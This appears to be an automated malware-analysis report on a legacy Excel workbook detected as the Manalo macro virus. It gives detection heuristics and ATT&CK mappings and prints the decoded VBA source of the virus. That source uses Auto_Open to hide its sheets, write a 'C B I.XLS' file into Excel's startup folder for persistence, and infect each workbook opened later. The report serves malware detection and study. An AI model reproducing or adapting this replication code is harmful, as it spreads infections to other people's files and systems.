MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
This Excel 5 macro virus, identified as Xls.Trojan.Manalo-3 by ClamAV, uses an Auto_Open macro to execute. The script attempts to copy itself and other sheets into a new workbook, saving it as 'C B I.XLS' in the Excel startup path, thereby establishing persistence. The embedded text 'manalo-e' and the ClamAV detection name further support the family attribution.
Heuristics 4
-
ClamAV: Xls.Trojan.Manalo-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Manalo-3
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUSLegacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13263 bytes |
SHA-256: 31cadf8e5cba74200e98976ae73bb90d01cb94377206447a968a45db6ae3a0a7 |
|||
|
Detection
ClamAV:
Xls.Trojan.Manalo-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Life_Blood"
'
' INC v1.0
'
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "Jacob"
End Sub
Sub Jacob()
Attribute Jacob.VB_ProcData.VB_Invoke_Func = " \n14"
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "C B I.XLS")
If File$ <> "C B I.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile
FileDoesNotExist:
Infected$ = ActiveWorkbook.Name
Application.ScreenUpdating = False
Set newBook = Workbooks.Add
With newBook
.Title = ""
.Subject = ""
End With
NewWorkbook$ = ActiveWorkbook.Name
Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
If Sheet$ <> "Life_Blood" _
Then
Workbooks(Infected$).Sheets("INC").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
Workbooks(Infected$).Sheets("Life_Blood").Copy Before:=Workbooks(NewWorkbook$).Sheets("INC")
Workbooks(NewWorkbook$).Sheets("Life_Blood").Visible = False
Workbooks(NewWorkbook$).Sheets("INC").Visible = False
Else
End If
ActiveWindow.Visible = False
Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "C B I.XLS"
GoTo Finish
InfectOpenFile:
FileName$ = ActiveWorkbook.Name
FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
Application.ScreenUpdating = False
If FirstSheet$ <> "Life_Blood" _
Then
Workbooks("C B I.XLS").Sheets("Life_Blood").Copy Before:=Workbooks(FileName$).Sheets(1)
Workbooks("C B I.XLS").Sheets("INC").Copy After:=Workbooks(FileName$).Sheets("Life_Blood")
Workbooks(FileName$).Sheets("INC").Name = "85 Years"
Workbooks("C B I.XLS").Sheets("INC").Copy Before:=Workbooks(FileName$).Sheets("85 Years")
Workbooks(FileName$).Sheets("Life_Blood").Visible = False
Workbooks(FileName$).Sheets("INC").Visible = False
Workbooks(FileName$).Sheets("85 Years").Visible = False
Else
End If
If Format(Now(), "yy mm dd") >= "99 07 27" Then
Else: Workbooks(FileName$).Sheets("85 Years").Visible = False
End If
Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "C B I.XLS!Jacob"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet16"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet17"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable
... (truncated)
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD00001D5F/Ole10Native | 38180 bytes |
SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.